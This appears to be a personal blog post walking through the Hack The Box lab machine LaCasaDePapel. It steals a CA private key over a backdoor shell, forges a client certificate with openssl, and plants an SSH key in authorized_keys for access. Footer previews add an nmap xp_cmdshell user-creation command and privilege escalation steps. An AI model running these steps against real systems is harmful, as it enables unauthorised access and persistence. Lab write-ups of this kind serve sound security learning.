Skip to main content

Creating Self Signed Certificate

By

Some times,we need a Self signed certificate. So, to create it we need the CA's website.cer file and CA's private key.


lets download the ca certificate from the website

 Import the certificate and save it




Lets start creating a new certificate:

Example from LaCasaDePapel

rlwrap nc 10.10.10.131 6200 //gets a responsive shell

scandir("/home/berin")

 file_get_contents("/home/nairobi/ca.key")


Lets vertify the private key we have matches the certificate we have.

openssl pkey -in ca.key -pubout

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----


openssl x509 -in lacasadepapelhtb.crt -pubkey -noout

openssl x509 -in lacasadepapelhtb.crt -pubkey -noout both of them match, so the private key(ca.key). So, we have the private key from the cerfificate authroity to trust this server. we can be use this to create a client certificate




lets create a Client.key

Creating a Client Key:

openssl genrsa -out client.key 4096


Creating a certificate signing request

openssl req -new -key client.key -out client.csr


openssl x509 -req -in client.csr -CA web.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer



This is the list of files that we got as of now.





firefox doesnt accept this, it has to be pkcs12, so we need to convert this,,

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12



client.p12 is a combination of client.key and client.cer
client.cer is just the signed version of client.csr



  go to firefox → certificates → your certificates → import


Add the certificate → ok



  Go to Authorities → import -->

  select the certificate that you downloaded from the website → ok

click on edit Trust → tick both the options 


Now if you try accessing the website, you can get into it without any problem..

==================================================


Creating our own SSH key to add it into Authorized keys to get a shell


create our own ssh key
 ssh-keygen

two files will be created


copy id_rsa.pub key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali



rlwrap nc 10.10.10.131 6200
scandir("/home/dali/.ssh")


file_put_contents("/home/dali/.ssh/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali")


or else file append to add the data after it instead of replace the data in the file.


file_put_contents("/home/dali/.ssh/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali", FILE_APPEND)




file_get_contents("/home/dali/.ssh/authorized_keys")




chmod 600 id_rsa
ssh -i id_rsa dali@10.10.10.131












Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more